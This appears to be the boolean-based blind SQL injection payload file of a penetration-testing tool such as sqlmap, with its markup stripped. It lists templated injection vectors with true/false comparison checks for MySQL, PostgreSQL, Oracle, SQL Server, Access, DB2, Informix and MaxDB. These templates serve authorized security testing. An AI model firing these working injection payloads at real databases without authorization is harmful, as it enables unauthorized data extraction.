AND boolean-based blind - WHERE or HAVING clause 1 1 1 1,8,9 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause 1 1 3 1,9 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] OR [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause (NOT) 1 3 3 1,9 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 1 1,8,9 1 AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) OR boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 3 1,9 2 OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) AND boolean-based blind - WHERE or HAVING clause (comment) 1 2 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause (comment) 1 2 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause (NOT - comment) 1 4 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR NOT [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] # OR [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) 1 3 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]
MySQL
AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] %16 AND [RANDNUM]=[RANDNUM1]
Microsoft Access
OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] %16 OR [RANDNUM]=[RANDNUM1]
Microsoft Access
MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause 1 2 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) 1 3 1 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) 1 3 3 1,2,3 2 OR MAKE_SET([INFERENCE],[RANDNUM]) OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) 1 4 1 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) 1 4 3 1,2,3 2 OR ELT([INFERENCE],[RANDNUM]) OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) 1 5 1 1,2,3,8 1 AND ([INFERENCE])*[RANDNUM] AND ([RANDNUM]=[RANDNUM])*[RANDNUM1] AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) 1 5 3 1,2,3 2 OR ([INFERENCE])*[RANDNUM] OR ([RANDNUM]=[RANDNUM])*[RANDNUM1] OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) 1 2 1 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST) 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 1 2 1 1 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
Boolean-based blind - Parameter replace (original value) 1 1 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) MySQL boolean-based blind - Parameter replace (MAKE_SET) 1 4 1 1,2,3 3 MAKE_SET([INFERENCE],[RANDNUM]) MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 5 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (ELT) 1 4 1 1,2,3 3 ELT([INFERENCE],[RANDNUM]) ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL boolean-based blind - Parameter replace (ELT - original value) 1 5 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (bool*int) 1 4 1 1,2,3 3 ([INFERENCE])*[RANDNUM] ([RANDNUM]=[RANDNUM])*[RANDNUM1] ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 5 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
MySQL
PostgreSQL boolean-based blind - Parameter replace 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (original value) 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) 1 5 1 1,2,3 3 (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 5 1 1,2,3 3 (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
Oracle boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Oracle boolean-based blind - Parameter replace (original value) 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Informix boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
Informix
Informix boolean-based blind - Parameter replace (original value) 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
Informix
Microsoft Access boolean-based blind - Parameter replace 1 3 1 1,3 3 IIF([INFERENCE],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)
Microsoft Access
Microsoft Access boolean-based blind - Parameter replace (original value) 1 4 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
Boolean-based blind - Parameter replace (DUAL) 1 2 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) Boolean-based blind - Parameter replace (DUAL - original value) 1 3 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) Boolean-based blind - Parameter replace (CASE) 1 2 1 1,3 3 (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) Boolean-based blind - Parameter replace (CASE - original value) 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL >= 5.0
MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL < 5.0
MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL < 5.0
PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - ORDER BY clause (original value) 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) 1 5 1 3 1 ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
Oracle boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause 1 4 1 2,3 1 ,IIF([INFERENCE],1,1/0) ,IIF([RANDNUM]=[RANDNUM],1,1/0) ,IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 5 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause 1 4 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)
SAP MaxDB
SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 5 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
SAP MaxDB
IBM DB2 boolean-based blind - ORDER BY clause 1 4 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
IBM DB2 boolean-based blind - ORDER BY clause (original value) 1 5 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
HAVING boolean-based blind - WHERE, GROUP BY clause 1 3 1 1,2 1 HAVING [INFERENCE] HAVING [RANDNUM]=[RANDNUM] HAVING [RANDNUM]=[RANDNUM1] MySQL >= 5.0 boolean-based blind - Stacked queries 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - Stacked queries 1 5 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL < 5.0
PostgreSQL boolean-based blind - Stacked queries 1 3 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
